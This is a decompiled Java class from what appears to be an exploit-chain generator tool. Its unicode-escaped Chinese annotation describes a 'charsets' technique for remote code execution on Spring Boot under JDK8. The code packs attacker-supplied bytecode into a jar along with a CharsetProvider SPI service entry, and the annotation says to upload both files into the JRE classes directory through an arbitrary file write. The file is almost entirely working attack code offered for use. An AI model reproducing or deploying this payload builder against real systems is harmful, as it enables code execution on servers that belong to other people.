/*
 * Decompiled with CFR 0.152.
 */
package com.ar3h.chains.gadget.impl.common.other;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import java.io.ByteArrayOutputStream;
import java.util.jar.JarEntry;
import java.util.jar.JarOutputStream;

@GadgetTags(tags={"CharsetJAR", "Other"}, nextTags={"BytecodeConvertTag"})
@GadgetAnnotation(name="charsets\u5229\u7528\u59ff\u52bf2-\u5b57\u8282\u7801", description="\u9002\u7528\u4e8e SpringBoot \u73af\u5883\u4e0b\u5199\u5b57\u8282\u7801\u6587\u4ef6\u4ee5\u53caSPI service\u6587\u4ef6\u8fdb\u884c RCE\n\u9700\u8981\u5c06\u4e0a\u8ff0\u4e24\u4e2a\u6587\u4ef6\u4e0a\u4f20\u81f3: /usr/lib/jvm/java-1.8-openjdk/jre/classes/ \u76ee\u5f55\u4e0b, \u5e76\u4e14\u9700\u8981\u521b\u5efa\u5bf9\u5e94\u6587\u4ef6\u5939\n\u6b64Gadget\u751f\u6210\u7684\u662f\u4e00\u4e2ajar\u5305, \u9700\u8981\u81ea\u884c\u89e3\u538b\u83b7\u53d6\u91cc\u9762\u7684 class\u5b57\u8282\u7801\u6587\u4ef6\u548c META-INF/services/java.nio.charset.spi.CharsetProvider \u6587\u4ef6, \u7136\u540e\u8fdb\u884c\u4e0a\u4f20\nReference: https://threedr3am.github.io/2021/04/14/JDK8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%9C%BA%E6%99%AF%E4%B8%8B%E7%9A%84SpringBoot%20RCE/\n", dependencies={"springboot"}, authors={"threedr3am"}, priority=30)
public class CharsetJarConvert2
implements Gadget {
    public byte[] getObject(byte[] bytecode, String className) throws Exception {
        return CharsetJarConvert2.createCharsetJar(bytecode, className);
    }

    @Override
    public Object invoke(GadgetContext context, GadgetChain chain) throws Exception {
        context.put(ContextTag.CHARSET_WRAPPER_KEY, true);
        byte[] bytecode = (byte[])chain.doCreate(context);
        String className = context.getString(ContextTag.CLASS_NAME_KEY);
        return this.getObject(bytecode, className);
    }

    public static byte[] createCharsetJar(byte[] byteCode, String className) throws Exception {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        try (JarOutputStream jos = new JarOutputStream(baos);){
            JarEntry entry = new JarEntry(className.replace(".", "/") + ".class");
            jos.putNextEntry(entry);
            jos.write(byteCode);
            jos.closeEntry();
            entry = new JarEntry("META-INF/services/java.nio.charset.spi.CharsetProvider");
            jos.putNextEntry(entry);
            jos.write(className.getBytes());
            jos.closeEntry();
        }
        return baos.toByteArray();
    }
}

